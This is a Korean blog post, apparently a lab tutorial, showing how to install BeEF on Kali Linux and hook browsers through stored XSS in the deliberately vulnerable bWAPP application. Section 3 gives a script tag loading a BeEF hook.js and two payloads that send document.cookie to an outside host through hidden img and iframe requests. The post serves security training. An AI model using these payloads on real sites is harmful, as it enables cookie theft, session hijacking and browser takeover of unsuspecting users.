일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | ||||
4 | 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 |
18 | 19 | 20 | 21 | 22 | 23 | 24 |
25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- AWS SSM
- 보안 그룹
- 티스토리챌린지
- 스마트컨트랙트
- 정처기
- web shell
- Path Traversal
- splunk db connect
- systems manager
- web security academy
- web3
- 메타코드
- 정처기필기
- amazon s3 트리거
- web3 보안
- AWS CLI
- 스마트 컨트랙트
- aws lambda
- Session Manager
- File Upload
- 오블완
- 탈중앙화
- 정처기 필기
- 정보처리기사
- aws 트리거
- ELB
- 메타코드M
- metacode
- 블록체인
- metacodem
Archives
- Today
- Total
min8282
BeEF 활용 악성코드 공격(1) 본문
1. 가상 머신 설정
실습을 위해 윈도우와 칼리 리눅스 가상 머신을 설정한다.
- 윈도우 설정
- 메모리: 2GB
- 프로세서: 2개
- 네트워크: NAT 설정
- 절전 모드: 사용 안 함
- 윈도우 업데이트: 사용 안 함
2. 칼리 리눅스 환경 설정
BeEF 설치 및 실행을 위해 칼리 리눅스에서 아래 명령어를 실행한다.
sudo apt update
sudo apt install beef-xss
sudo beef-xss
- BeEF 첫 실행 시 비밀번호 설정 (예: 1234)
- 브라우저에서 http://127.0.0.1:3000/ui/panel로 접속하여 BeEF 패널에 들어간다.
- BeEF 훅 URL: http://192.168.183.129:3000/hook.js
3. bWAPP 게시판 악성코드 삽입
<script src="http://192.168.183.129:3000/hook.js"></script>
bWAPP의 XSS-Stored(Blog)에 위와 같이 스크립트를 작성하여 악성코드를 삽입한다.
*추가로 클라이언트의 쿠키 정보를 외부로 전송하거나, iframe을 사용한 악성 코드 삽입을 아래와 같은 스크립트로 진행할 수 있다.
<script> document.write("<img src='http://192.168.20.131/cookie.php?cookie="+document.cookie+"'>") </script>
<script> document.write("<iframe src='http://192.168.20.131/cookie.php?cookie="+document.cookie+"' width=0 height=0></iframe>") </script>
4. BeEF 패널에서 클라이언트 메시지 보내기
BeEF 패널로 접속하면(http://127.0.0.1:3000/ui/panel) 왼쪽 온라인 브라우저 목록에 현재 접속한 브라우저의 정보가 나타나게 된다.
BeEF 패널에서 다양한 기능을 실행할 수 있다. 지금은 Alert 메시지를 보내볼 것이다.
BeEF 패널에서 Commands>Create Alert Dialog 선택 후 원하는 메시지를 입력하고 실행시키면
클라이언트 브라우저에 위와 같이 메시지가 출력된다.
'Security > Application' 카테고리의 다른 글
[모의해킹] 웹 애플리케이션 정보 수집 방법 (0) | 2025.03.06 |
---|---|
Metasploitable2 - FTP 취약점 공격 (vsftpd 2.3.4, CVE-2011-2523) (0) | 2025.02.25 |
BeEF 활용 악성코드 공격(2) (0) | 2025.02.18 |